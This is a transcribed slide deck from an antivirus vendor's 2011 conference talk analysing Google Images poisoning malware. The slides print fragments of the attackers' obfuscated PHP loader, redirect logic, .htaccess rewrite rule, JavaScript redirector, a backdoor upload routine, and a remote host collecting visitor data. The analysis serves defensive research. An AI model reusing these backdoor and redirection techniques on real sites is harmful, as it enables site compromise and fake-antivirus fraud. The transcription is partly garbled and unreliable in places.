Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Poisoning Google images

There have long been links on the internet that take the unwary user to a page with unexpected or malicious content. Most of these attempts rely on the user to click on the link to be successful. However, the latest variation has moved beyond simple text links to "Google-image poisoning" - placing malware in the middle of Google searches for images where users have traditionally had no reason to be wary. Our presentation will focus on How malware writers are able to infect the average website; detailed analyses of the PHP script used to infect s ites and SEO techniques to get infected images at the top of search results.

  • Login to see the comments

Poisoning Google images

  1. 1. Analysis of Google ImagesPoisoningLukáš HamíkJan Širmer www.avast.com
  2. 2. Agenda• What is Google-images poisoning?• How it works• Doorway generator• Java script redirector• Evolution• Data from AVAST CommunityIQ userbase• Summary• QuestionsAVAR 2011 www.avast.com
  3. 3. Google Images poisoning• SEO blackhat poisoning attack• Uses hacked sites to redirect users to sites containing fake AV or exploit• Uses key-word rich pages with hot-linked images for higher indexing by search bots• Images from hacked sites are near the top search results• Focused on users coming from well-know search enginesAVAR 2011 www.avast.com
  4. 4. Google Images poisoning User How it works? Infected serverAVAR 2011 www.avast.com
  5. 5. Google search resultsAVAR 2011 www.avast.com
  6. 6. Google Images poisoning User Infected server Fake AV Remote serverAVAR 2011 www.avast.com
  7. 7. Fake antivirusesAVAR 2011 www.avast.com
  8. 8. Google Images poisoning User Infected server Fake AV Remote server Bad guyAVAR 2011 www.avast.com
  9. 9. Why is it so successful?• Great SEO and nobody umed SEO for “imagem”AVAR 2011 www.avast.com
  10. 10. Why is it so successful? (2)• Computer users do not expect that they can get infected when searching for images on legitimate sites Infected Fake AV serverAVAR 2011 www.avast.com
  11. 11. Why is it so successful? (3)• Hide and Seek – if users are using Opera browser or they are coming from Google, Yahoo or a Bing, they are served a Java script redirector Malicious contentAVAR 2011 www.avast.com
  12. 12. Your website gets infected• The bad guys are using stolen FTP credentials• They upload PHP script to the WEB server• This is used for uploading malicious content to the web server, creating spam pages, and uploading additional files to web server• Bonus feature - it lets the owners know that the page is readyAVAR 2011 www.avast.com
  13. 13. Additional malicious files• Xmlrpc.txt – Remote server address stored• -> Xml.txt -> Xml.cgi – address in Base64• Iog.txt – Redirecting java script stored• Shab100500.txt – Spam HTML template stored• -> Don.txt – HTML template in Base64AVAR 2011 www.avast.com
  14. 14. PHP script on infected sites• Earlier, they used names such as d{1,3}.php• Today, they use names like microphone.php, etc.• This script is responsible for: 1. Creating spam pages for Google bot indexing 2. Changing .htaccess 3. Serving redirect script to user to exploit sites 4. Serving redirect script to user to fake AV 5. Downloading malicious files to server 6. Telling owners that the site is readyAVAR 2011 www.avast.com
  15. 15. PHP scriptOriginal PHP file uploaded to server• <?eval (gzuncompress (base64_decode(eNqVWG2P4kYM/…/woBlZVjC9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I=) ) ); ?>AVAR 2011 www.avast.com
  16. 16. PHP scriptPHP file after first step of deobfuscation• $GLOBALS[_1600532410_]=Array(base64_dec ode(ZXJyb3Jfcm.Vwb3J0.aW5.n• Function _1070120820($i) {$a=Array(c.Q=.=,cQ==,• ($GLOBALS[_1600532410_][16]( _1070120820(6))) {…AVAR 2011 www.avast.com
  17. 17. PHP script after removingobfuscationif (strpos($_SERVER[HTTP_USER_AGENT], Opera) !== false) {}if (strpos($_SERVER[HTTP_REFERER], google.) || strpos($_SERVER[HTTP_REFERER], yahoo.) || strpos($_SERVER[HTTP_REFERER], bing.) > 0) {$_10 = file_get_contents(.log/ . $_4 . /xmlrpc.txt);AVAR 2011 www.avast.com
  18. 18. Doorway generator• HTML template is stored in the file .log/SITE/shab100500.txt• In the new version, shab100500.txt was replaced by don.txt <HTML> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in <Replaceme> </Replaceme> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco </HTML> www.avast.com
  19. 19. Doorway generator• Get descriptions of top 40 ‘mearch keywordm’ harmful action from Google web against a person or group in response• Shuffle the words into revenge to a their descriptions to get grievance, be it real unique text or rick santorum perceived www.avast.com
  20. 20. Doorway generator• Get top 20 ‘mearch <img keyword’ from Google src="http://SITE/p Images and extract links ath/hot-linked- to image files image.jpg"• Generates <img> tags alt="search and shuffle them keywords" align="random(cent er, right, left)"> www.avast.com
  21. 21. Doorway generator<img harmful action against aharmful actionsrc="http://SITE/p person or group in against a person orath/hot-linked- response revenge to a group in responseimage.jpg" grievance<img revenge to aalt="search src="http://SITE/path/hot- grievance, be it realkeywords" linked-image.jpg" or rick santorumalign="random(cent alt="search keywords" perceiveder, right, left)"> align="random(center, right , left)"> www.avast.com
  22. 22. Doorway generator<HTML>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt utlabore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamcolaboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in<h1>SEARCH KEYWORD</h1>Suggested links<Replaceme>Links to 30 most recently generated links</Replaceme>Rich-word generated text with hot-linked imagesLinks to alternative pagesLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt utlabore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco</HTML> www.avast.com
  23. 23. How do they make image URLsless suspicious?• "RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ ".$_SERVER[ SCRIPT_NAME."?q=$1 [L] “• this changes URL from suspicioushttp://SITE/wp-admin/BAD.php?q=search-keywords to http://SITE/wp-admin/search-keywordsAVAR 2011 www.avast.com
  24. 24. PHP script evolution• The first version was focused on all users using Opera browser or users coming from Google, Yahoo or Bing• During June, we found some changes in PHP code - Google is the only target - New redirection system• Request goes to a remote server ( mydiarycom.net ) - centralized• They have statistic data from parameters• No need to update iog.txt (redirecting script) or make differentiating changes on each serverAVAR 2011 www.avast.com
  25. 25. Data parametershttp://mydiarycom.net/out/stat.cgi?parameter=1. Name of the doorway site2. The full URL of doorway script3. Vimitor’m IP4. The referring URL5. The User-Agent of the umer’m browmer6. The search query used on GoogleAVAR 2011 www.avast.com
  26. 26. IP address and user-agents Fake AVAVAR 2011 www.avast.com
  27. 27. IP address and user-agents Spam pageAVAR 2011 www.avast.com
  28. 28. JavaScript redirectorvar URL = “SITE contains FakeAV” +encodeURIComponent(document.referrer) +"&parameter=$keyword&se=$se&ur=1&HTTP_REF ERER=“ +encodeURIComponent(document.URL) +"&default_keyword=default";if (window!=top) {top.location.href = URL;}else document.location= URL;AVAR 2011 www.avast.com
  29. 29. Redirection• Mac – http://IP/r/RANDOM_STRING IP and ‘r’ are change enery 30 minutem• Exploit site - http://SITE/index.php?tp=RANDOM_STRING Site and ‘tp’ are change enery 30 minutem• Fake AV – http://SITE/fast-scan/AVAR 2011 www.avast.com
  30. 30. Other changes• Rotating user-agent string• Password-protected maintenance request Someone who know how this algorithm works can easily change it and redirect to his or her own site• Xml.txt was replaced by xml.cgi• Working with free blogs sitesAVAR 2011 www.avast.com
  31. 31. Password-protected maintenancerequestif ($_GET[ dom100500 != { $_13 = fopen( .log/$_4. /xmlrpc.txt w+; fwrite($_13,$_GET[ dom100500); fclose($_13);if ($_GET[ up100500 != { $_14 = $_14 = $_14 . basename( $_FILES[ uploaded[ name) ; $_15=round(0+0.5+0.5); if(move_uploaded_file($_FILES[ uploaded[ tmp_name, $_14))AVAR 2011 www.avast.com
  32. 32. Data from theAVAST CommunityIQ• From March to August 2011, we discovered 22,580 unique infected sites• 5,698 sites are still infected• Typo : <IMG HEIGTH=?1?WIDTHAVAR 2011 www.avast.com
  33. 33. Infected domainsAVAR 2011 www.avast.com
  34. 34. Number of infected domainsAVAR 2011 www.avast.com
  35. 35. Summary• Google-image poisoning is an easy way how to spread fake AV and exploits• It’m bamed on mtolen FTP credentialm of webmamterm and great backdoor algorithms• The number of infected legitimate domains is growing every day• Common sense is not sufficient protectionAVAR 2011 www.avast.com
  36. 36. Questions and AnswersAVAR 2011 www.avast.com
  37. 37. Thank youJan Sirmer (sirmer@avast.com)Senior Virus AnalystLukas Hasik (hasik@avast.com)QA DirectorAVAR 2011 www.avast.com

×